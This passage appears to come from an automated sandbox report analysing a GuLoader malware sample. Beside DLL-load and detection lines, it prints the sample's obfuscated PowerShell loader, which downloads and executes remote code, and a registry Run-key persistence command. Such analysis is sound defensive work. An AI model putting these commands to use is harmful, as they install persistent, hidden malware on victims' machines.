            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: .Automation.pdb source: powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: m.Core.pdbs source: powershell.exe, 00000004.00000002.128209128889.0000000008499000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: m.Core.pdba source: powershell.exe, 00000004.00000002.128209128889.0000000008499000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($D", "0")
            Yara detected GuLoader
            Source: Yara matchFile source: 00000004.00000002.128210723875.0000000009E7D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Overcompetition)$GlOBaL:frySedISkenEs = [sysTEm.tEXt.encOdING]::asCII.GEtSTrING($vEJLeDERenS)$glOBAl:lNGsELsFUldt=$FrysEDiskEnes.subStRiNG($oCCIPItAllynsuCkEN,$OvErLdER)<#Cricketed N
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Fredsforstyrreres $Kampmodet57 $Eftertackling), (Yurak205 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Cabirean = [AppDomain]::CurrentDomain.GetAssembli
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Vaerker)), $Kremersphaltus).DefineDynamicModule($Udkoblings, $false).DefineType($Rygradenes, $Konspirationernes184, [System.MulticastD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Overcompetition)$GlOBaL:frySedISkenEs = [sysTEm.tEXt.encOdING]::asCII.GEtSTrING($vEJLeDERenS)$glOBAl:lNGsELsFUldt=$FrysEDiskEnes.subStRiNG($oCCIPItAllynsuCkEN,$OvErLdER)<#Cricketed N
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra.
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra.
